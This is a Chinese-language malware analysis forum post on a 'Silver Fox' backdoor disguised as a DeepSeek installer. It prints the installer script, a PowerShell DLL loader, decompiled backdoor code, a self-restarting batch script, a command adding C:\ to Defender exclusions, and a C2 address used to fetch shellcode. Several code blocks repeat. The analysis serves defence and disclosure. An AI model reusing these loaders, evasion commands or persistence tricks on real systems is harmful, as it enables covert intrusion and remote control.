-
-
[原创]【病毒分析】潜伏在AI工具中的幽灵:银狐家族社工攻击的深度剖析
-
发表于: 2025-3-11 10:44
-
近期,AI大模型领域热度飙升,DeepSeek等开源大模型成为开发者与普通用户的热门选择。攻击者敏锐捕捉到这一趋势,将恶意软件伪装成"DeepSeek大模型自动安装助手",利用用户对技术工具的迫切需求实施精准社工攻击。"银狐"家族作为长期活跃的APT组织,擅长通过热点事件伪造合法软件,此次攻击是其新型社会工程学策略的典型体现,该样本来源银狐突袭!DeepSeek本地化部署暗藏“致命陷阱”。
拖入die中,发现是由nsis打包而成的
使用7zip-nsis解包
其中[NSIS].nsi文件为安装配置,关键部分如下。在$APPDATA\Axialis目录释放文件之后,执行Decision.vbs,然后再将真正的ds大模型安装助手的快捷方式放置于桌面
解包后$APPDATA\Axialis目录下为后门程序
首先是Decision.vbs,用于启动同路径下的silently.ps1文件
silently.ps1文件内容如下,用于启动同路径下的Update.dll的导出函数TCGamerUpdateMain
首先创建互斥体保证只有一个实例运行,然后获取C:\Users\username\AppData\Roaming\Axialis 这个路径下的Config2.ini文件。
然后在内存中加载shellcode
shellcode创建线程执行操作
通过执行指令powershell -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"将c盘添加到windows defender白名单中
执行流程如下
写入monitor.bat并执行
monitor.bat内容如下,作用为充当守护进程,在特定进程被关闭时就重新启动该进程
创建xml和ps1文件并调用ps1文件添加计划任务
xml文件内容如下,用于执行Decision.vbs,其中利用了引号来规避杀软的字符串匹配""D""e""c""i""s""i""o""n.vbs
然后释放文件updated.ps1内容如下,用于添加计划任务
然后调用shell32_ShellExecuteEx执行
遍历寻找进程Telegram.exe
如果寻找到这个进程就调用shell32_ShellExecuteEx打开rundll32.exe执行C:\\Users\\123\\AppData\\Roaming\\\\Axialis\\\\Update.dll,TCGamerUpdateMain。即调用这个导出函数执行config2.ini的内容
内存加载config2.ini,然后将其dump下来,发现他pdb没有删除
发现这是未混淆过的版本,功能与上文一致
然后执行远控模块
远程加载shllcode,从27.124.40.155:18852,其中接收了1c9db字节
dump下来后发现是一个dll,其中包含c2的配置信息
配置信息如下
连接c2服务器,接收指令并执行
本次分析的恶意样本系APT组织"银狐"利用DeepSeek大模型热度精心策划的社工攻击典型案例。攻击者通过伪造"大模型自动安装助手"软件,借助NSIS打包、PowerShell脚本注入、内存加载等技术,构建了一条隐蔽的攻击链路。其核心策略包括:
1.热点捆绑:以AI技术工具为伪装,精准诱骗技术用户下载;
2.持久控制:结合计划任务欺骗和进程共生机制,确保恶意程序长期存活。
该案例体现了APT攻击者对技术趋势的敏锐捕捉能力,以及对社会工程学与底层系统漏洞的深度融合。
Section MainSection ; Section_0 ; AddSize 136708
Sleep 500
SetOutPath $APPDATA\Axialis
Sleep 500
File Config.ini
Sleep 500
File Config2.ini
Sleep 500
File silently.ps1
Sleep 500
File Update.dll
Sleep 500
File Decision.vbs
Sleep 500
Exec "wscript //B $\"$APPDATA\Axialis\Decision.vbs$\""
SetOutPath $INSTDIR
Sleep 500
Sleep 500
SetOverwrite ifnewer
File ds大模型安装助手_1.0.0.6_1740119628.exe
Sleep 500
CreateShortCut $DESKTOP\ds大模型安装助手_1.0.0.6_1740119628.lnk $INSTDIR\ds大模型安装助手_1.0.0.6_1740119628.exe
SectionEndSection MainSection ; Section_0 ; AddSize 136708
Sleep 500
SetOutPath $APPDATA\Axialis
Sleep 500
File Config.ini
Sleep 500
File Config2.ini
Sleep 500
File silently.ps1
Sleep 500
File Update.dll
Sleep 500
File Decision.vbs
Sleep 500
Exec "wscript //B $\"$APPDATA\Axialis\Decision.vbs$\""
SetOutPath $INSTDIR
Sleep 500
Sleep 500
SetOverwrite ifnewer
File ds大模型安装助手_1.0.0.6_1740119628.exe
Sleep 500
CreateShortCut $DESKTOP\ds大模型安装助手_1.0.0.6_1740119628.lnk $INSTDIR\ds大模型安装助手_1.0.0.6_1740119628.exe
SectionEnd$RoamingDir = [System.Environment]::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Axialis\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
$code = @"using System;
using System.Runtime.InteropServices;
public class DllInvoker
{ [DllImport("$DllPathEscaped", CallingConvention = CallingConvention.Cdecl)]
public static extern void TCGamerUpdateMain();
}"@Add-Type -TypeDefinition $code[DllInvoker]::TCGamerUpdateMain()$RoamingDir = [System.Environment]::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Axialis\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
$code = @"using System;
using System.Runtime.InteropServices;
public class DllInvoker
{ [DllImport("$DllPathEscaped", CallingConvention = CallingConvention.Cdecl)]
public static extern void TCGamerUpdateMain();
}"@Add-Type -TypeDefinition $code[DllInvoker]::TCGamerUpdateMain()int sub_10014540()
{ int v0; // eax
int v1; // eax
v0 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v0);
((void (__stdcall *)(_DWORD, _DWORD, int (__usercall *)@<eax>(int@<ebp>), _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
sub_10013F20,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_1000A9F0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100137E0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_10014390,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100142F0,
0,
0,
0);
v1 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v1);
((void (*)(void))byte_10013450)();
((void (__stdcall *)(_DWORD))unk_1001DC47)(0);
return 0;
}int sub_10014540()
{ int v0; // eax
int v1; // eax
v0 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v0);
((void (__stdcall *)(_DWORD, _DWORD, int (__usercall *)@<eax>(int@<ebp>), _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
sub_10013F20,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_1000A9F0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100137E0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_10014390,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100142F0,
0,
0,
0);
v1 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v1);
((void (*)(void))byte_10013450)();
((void (__stdcall *)(_DWORD))unk_1001DC47)(0);
return 0;
}int __usercall sub_10013F20@<eax>(int a1@<ebp>)
{ v37 = a1;
v38 = retaddr;
v36 = -1;
v35 = &unk_10032941;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
*(_DWORD *)&v33[1] = &v39;
v28 = sub_10007310((char *)&v29 + 1);
qmemcpy(v30, "powershell -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"", sizeof(v30));
---------------------------------省略部分内容----------------------------------------
qmemcpy(v32, "/C ", sizeof(v32));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v13, 0, 56);
v13[0] = 64;
v13[1] = 0;
v13[2] = "open";
v13[3] = "cmd.exe";
v13[4] = string(v11);
v13[5] = 0;
v13[6] = 0;
if ( ((int (__stdcall *)(int *))shell32_ShellExecuteEx)(&v12) && v14 )
{
((void (__stdcall *)(int, int))kernel32_WaitForSingleObject)(v14, -1);
((void (__stdcall *)(int))kernel32_CloseHandle)(v14);
}
return maybe_alloc(v11);
}int __usercall sub_10013F20@<eax>(int a1@<ebp>)
{ v37 = a1;
v38 = retaddr;
v36 = -1;
v35 = &unk_10032941;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
*(_DWORD *)&v33[1] = &v39;
v28 = sub_10007310((char *)&v29 + 1);
qmemcpy(v30, "powershell -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"", sizeof(v30));
---------------------------------省略部分内容----------------------------------------
qmemcpy(v32, "/C ", sizeof(v32));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v13, 0, 56);
v13[0] = 64;
v13[1] = 0;
v13[2] = "open";
v13[3] = "cmd.exe";
v13[4] = string(v11);
v13[5] = 0;
v13[6] = 0;
if ( ((int (__stdcall *)(int *))shell32_ShellExecuteEx)(&v12) && v14 )
{
((void (__stdcall *)(int, int))kernel32_WaitForSingleObject)(v14, -1);
((void (__stdcall *)(int))kernel32_CloseHandle)(v14);
}
return maybe_alloc(v11);
}int __cdecl sub_10002D00(void *a1)
{ ((void (__stdcall *)(int, _BYTE *))kernel32_GetTempPathA)(260, v6);
str_addr = get_str_addr(v11, (int)v6);
v22 = str_addr;
v24 = 0;
str_concat((int)v13, str_addr, (int)"target.pid");
LOBYTE(v24) = 2;
maybe_alloc(v11);
v21 = get_str_addr(v10, (int)v6);
v20 = v21;
LOBYTE(v24) = 3;
str_concat((int)v14, v21, (int)"monitor.bat");
LOBYTE(v24) = 5;
maybe_alloc(v10);
create_file(v12, v14, 2, 64, 1);
LOBYTE(v24) = 6;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v12) )
{
((void (__cdecl *)(char *, const char *))write)(v12, "@echo off\n");
((void (*)(char *, const char *, ...))write)(v12, "set \"PIDFile=%TEMP%\\target.pid\"\n");
v1 = ((int (__cdecl *)(char *, const char *))write)(v12, "set \"VBSPath=");
v2 = write_2(v1, a1);
((void (__cdecl *)(int, void *))write)(v2, &unk_1003ACB8);
((void (*)(char *, const char *, ...))write)(v12, "set /p pid=<\"%PIDFile%\"\n");
((void (*)(char *, const char *, ...))write)(v12, "del \"%PIDFile%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, ":check\n");
((void (*)(char *, const char *, ...))write)(v12, "tasklist /fi \"PID eq %pid%\" | findstr /i \"%pid%\" > nul\n");
((void (__cdecl *)(char *, const char *))write)(v12, "if errorlevel 1 (\n");
((void (*)(char *, const char *, ...))write)(v12, " cscript //nologo \"%VBSPath%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, " exit\n");
((void (__cdecl *)(char *, void *))write)(v12, &unk_1003AD80);
((void (__cdecl *)(char *, const char *))write)(v12, "timeout /t 15\n");
((void (__cdecl *)(char *, const char *))write)(v12, "goto check\n");
((void (__thiscall *)(char *))file_close)(v12);
}
v3 = (const char *)string(v14);
((void (*)(_BYTE *, const char *, ...))exec)(v5, "cmd.exe /B /c \"%s\"", v3);
v19 = ((int (*)(void))kernel32_GetCurrentProcessId)();
create_file(v7, v13, 2, 64, 1);
LOBYTE(v24) = 7;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v7) )
{
((void (__thiscall *)(char *, int))unk_100041E0)(v7, v19);
((void (__thiscall *)(char *))file_close)(v7);
}
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v8, 0, 68);
v8[0] = 68;
v8[11] = 1;
v9 = 5;
v15 = 0;
v16 = 0;
v17 = 0;
v18 = 0;
if ( ((int (__stdcall *)(_DWORD, _BYTE *, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD *, int *))kernel32_CreateProcessA)(
0,
v5,
0,
0,
0,
0,
0,
0,
v8,
&v15) )
{
((void (__stdcall *)(int))kernel32_CloseHandle)(v15);
((void (__stdcall *)(int))kernel32_CloseHandle)(v16);
}
LOBYTE(v24) = 6;
((void (__thiscall *)(char *))unk_10003090)(v7);
LOBYTE(v24) = 5;
((void (__thiscall *)(char *))unk_10003090)(v12);
LOBYTE(v24) = 2;
maybe_alloc(v14);
v24 = -1;
return maybe_alloc(v13);
}int __cdecl sub_10002D00(void *a1)
{ ((void (__stdcall *)(int, _BYTE *))kernel32_GetTempPathA)(260, v6);
str_addr = get_str_addr(v11, (int)v6);
v22 = str_addr;
v24 = 0;
str_concat((int)v13, str_addr, (int)"target.pid");
LOBYTE(v24) = 2;
maybe_alloc(v11);
v21 = get_str_addr(v10, (int)v6);
v20 = v21;
LOBYTE(v24) = 3;
str_concat((int)v14, v21, (int)"monitor.bat");
LOBYTE(v24) = 5;
maybe_alloc(v10);
create_file(v12, v14, 2, 64, 1);
LOBYTE(v24) = 6;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v12) )
{
((void (__cdecl *)(char *, const char *))write)(v12, "@echo off\n");
((void (*)(char *, const char *, ...))write)(v12, "set \"PIDFile=%TEMP%\\target.pid\"\n");
v1 = ((int (__cdecl *)(char *, const char *))write)(v12, "set \"VBSPath=");
v2 = write_2(v1, a1);
((void (__cdecl *)(int, void *))write)(v2, &unk_1003ACB8);
((void (*)(char *, const char *, ...))write)(v12, "set /p pid=<\"%PIDFile%\"\n");
((void (*)(char *, const char *, ...))write)(v12, "del \"%PIDFile%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, ":check\n");
((void (*)(char *, const char *, ...))write)(v12, "tasklist /fi \"PID eq %pid%\" | findstr /i \"%pid%\" > nul\n");
((void (__cdecl *)(char *, const char *))write)(v12, "if errorlevel 1 (\n");
((void (*)(char *, const char *, ...))write)(v12, " cscript //nologo \"%VBSPath%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, " exit\n");
((void (__cdecl *)(char *, void *))write)(v12, &unk_1003AD80);
((void (__cdecl *)(char *, const char *))write)(v12, "timeout /t 15\n");
((void (__cdecl *)(char *, const char *))write)(v12, "goto check\n");
((void (__thiscall *)(char *))file_close)(v12);
}
v3 = (const char *)string(v14);
((void (*)(_BYTE *, const char *, ...))exec)(v5, "cmd.exe /B /c \"%s\"", v3);
v19 = ((int (*)(void))kernel32_GetCurrentProcessId)();
create_file(v7, v13, 2, 64, 1);
LOBYTE(v24) = 7;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v7) )
{
((void (__thiscall *)(char *, int))unk_100041E0)(v7, v19);
((void (__thiscall *)(char *))file_close)(v7);
}
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v8, 0, 68);
v8[0] = 68;
v8[11] = 1;
v9 = 5;
v15 = 0;
v16 = 0;
v17 = 0;
v18 = 0;
if ( ((int (__stdcall *)(_DWORD, _BYTE *, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD *, int *))kernel32_CreateProcessA)(
0,
v5,
0,
0,
0,
0,
0,
0,
v8,
&v15) )
{
((void (__stdcall *)(int))kernel32_CloseHandle)(v15);
((void (__stdcall *)(int))kernel32_CloseHandle)(v16);
}
LOBYTE(v24) = 6;
((void (__thiscall *)(char *))unk_10003090)(v7);
LOBYTE(v24) = 5;
((void (__thiscall *)(char *))unk_10003090)(v12);
LOBYTE(v24) = 2;
maybe_alloc(v14);
v24 = -1;
return maybe_alloc(v13);
}@echo offset "PIDFile=%TEMP%\target.pid"
set "VBSPath=C:\Users\123\AppData\Roaming\Axialis\Decision.vbs"
set /p pid=<"%PIDFile%"
del "%PIDFile%"
:checktasklist /fi "PID eq %pid%" | findstr /i "%pid%" > nul
if errorlevel 1 (
cscript //nologo "%VBSPath%"
exit
)timeout /t 15goto check
@echo offset "PIDFile=%TEMP%\target.pid"
set "VBSPath=C:\Users\123\AppData\Roaming\Axialis\Decision.vbs"
set /p pid=<"%PIDFile%"
del "%PIDFile%"
:checktasklist /fi "PID eq %pid%" | findstr /i "%pid%" > nul
if errorlevel 1 (
cscript //nologo "%VBSPath%"
exit
)timeout /t 15goto check
// bad sp value at call has been detected, the output may be wrong!int __usercall sub_1000A9F0@<eax>(int a1@<ecx>, int a2@<ebp>, _DWORD *a3@<edi>, int a4@<esi>)
{ ((void (__stdcall *)(int, int *, int, struct _EXCEPTION_REGISTRATION_RECORD *, void *, int))unk_10016430)(
a1,
&v50,
a1,
NtCurrentTeb()->NtTib.ExceptionList,
&unk_1003270B,
-1);
v48 = (int)&v50;
v47 = a4;
v46 = a3;
get_str_addr(&v49[-1002], (int)".NET Framework NGEN v4.0.30325");
v48 = 0;
v49[-885] = get_Roaming_FolderPath(&v49[-1100], 26);
v49[-886] = v49[-885];
LOBYTE(v48) = 1;
str_concat((int)&v49[-996], (void *)v49[-886], (int)"\\Axialis\\Decision.vbs");
LOBYTE(v48) = 3;
maybe_alloc(&v49[-1100]);
v4 = string(&v49[-996]);
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A7F0)(&v49[-990], v4);
LOBYTE(v48) = 4;
v49[-805] = sub_10007310((char *)&v49[-113] + 3);
qmemcpy(
&v49[-112],
"base64编码后的数据",
220);
v5 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, _DWORD *))unk_10001730)(&v49[-1016], &v49[-112], &v49[-57]);
v6 = v5[1];
v49[-864] = *v5;
v49[-863] = v6;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-892], v49[-864], v49[-863], v49[-805]);
LOBYTE(v48) = 5;
v49[-806] = sub_10007310((char *)&v49[-113] + 2);
qmemcpy(
&v49[-804],
“base64编码的数据”,
2744);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-24], "\\PolicyManagement.xml", 21);
v13 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1018],
&v49[-24],
(char *)&v49[-19] + 1);
---------------------------------省略部分内容---------------------------------------- qmemcpy(&v49[-56], "powershell -Command \"Set-ExecutionPolicy Unrestricted -Scope CurrentUser\"", 73);
v25 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1078],
&v49[-56],
(char *)&v49[-38] + 1);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-18], "cmd.exe /C ", 11);
v27 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1010],
&v49[-18],
(char *)&v49[-16] + 3);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-35], "powershell -ExecutionPolicy Bypass -File ", 41);
v30 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1012],
&v49[-35],
(char *)&v49[-25] + 1);
v31 = v30[1];
v49[-880] = *v30;
v49[-879] = v31;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-928], v49[-880], v49[-879], v49[-853]);
LOBYTE(v48) = 67;
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A6B0)(&v49[-966], &v49[-928]);
LOBYTE(v48) = 69;
((void (__thiscall *)(_DWORD *))unk_10011170)(&v49[-928]);
v49[-859] = string(&v49[-898]);
v49[-854] = sub_10007310((char *)&v49[-115] + 2);
qmemcpy(v43, "/C ", sizeof(v43));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(&v49[-947], 0, 56);
v49[-947] = 64;
v49[-946] = 0;
v49[-945] = "open";
v49[-944] = "cmd.exe";
v49[-943] = string(&v49[-966]);
v49[-942] = 0;
v49[-941] = 0;
if ( ((int (__stdcall *)(_DWORD *))shell32_ShellExecuteEx)(&v49[-948]) && v49[-934] )
{
((void (__stdcall *)(_DWORD, int))kernel32_WaitForSingleObject)(v49[-934], -1);
((void (__stdcall *)(_DWORD))kernel32_CloseHandle)(v49[-934]);
}
return v49[-862];
}// bad sp value at call has been detected, the output may be wrong!int __usercall sub_1000A9F0@<eax>(int a1@<ecx>, int a2@<ebp>, _DWORD *a3@<edi>, int a4@<esi>)
{ ((void (__stdcall *)(int, int *, int, struct _EXCEPTION_REGISTRATION_RECORD *, void *, int))unk_10016430)(
a1,
&v50,
a1,
NtCurrentTeb()->NtTib.ExceptionList,
&unk_1003270B,
-1);
v48 = (int)&v50;
v47 = a4;
v46 = a3;
get_str_addr(&v49[-1002], (int)".NET Framework NGEN v4.0.30325");
v48 = 0;
v49[-885] = get_Roaming_FolderPath(&v49[-1100], 26);
v49[-886] = v49[-885];
LOBYTE(v48) = 1;
str_concat((int)&v49[-996], (void *)v49[-886], (int)"\\Axialis\\Decision.vbs");
LOBYTE(v48) = 3;
maybe_alloc(&v49[-1100]);
v4 = string(&v49[-996]);
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A7F0)(&v49[-990], v4);
LOBYTE(v48) = 4;
v49[-805] = sub_10007310((char *)&v49[-113] + 3);
qmemcpy(
&v49[-112],
"base64编码后的数据",
220);
v5 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, _DWORD *))unk_10001730)(&v49[-1016], &v49[-112], &v49[-57]);
v6 = v5[1];
v49[-864] = *v5;
v49[-863] = v6;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-892], v49[-864], v49[-863], v49[-805]);
LOBYTE(v48) = 5;
v49[-806] = sub_10007310((char *)&v49[-113] + 2);
qmemcpy(
&v49[-804],
“base64编码的数据”,
2744);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-24], "\\PolicyManagement.xml", 21);
v13 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1018],
&v49[-24],
(char *)&v49[-19] + 1);
---------------------------------省略部分内容---------------------------------------- qmemcpy(&v49[-56], "powershell -Command \"Set-ExecutionPolicy Unrestricted -Scope CurrentUser\"", 73);
v25 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1078],
&v49[-56],
(char *)&v49[-38] + 1);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-18], "cmd.exe /C ", 11);
v27 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1010],
&v49[-18],
(char *)&v49[-16] + 3);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-35], "powershell -ExecutionPolicy Bypass -File ", 41);
v30 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1012],
&v49[-35],
(char *)&v49[-25] + 1);
v31 = v30[1];
v49[-880] = *v30;
v49[-879] = v31;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-928], v49[-880], v49[-879], v49[-853]);
LOBYTE(v48) = 67;
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A6B0)(&v49[-966], &v49[-928]);
LOBYTE(v48) = 69;
((void (__thiscall *)(_DWORD *))unk_10011170)(&v49[-928]);
v49[-859] = string(&v49[-898]);
v49[-854] = sub_10007310((char *)&v49[-115] + 2);
qmemcpy(v43, "/C ", sizeof(v43));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(&v49[-947], 0, 56);
v49[-947] = 64;
v49[-946] = 0;
v49[-945] = "open";
v49[-944] = "cmd.exe";
v49[-943] = string(&v49[-966]);
v49[-942] = 0;
v49[-941] = 0;
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
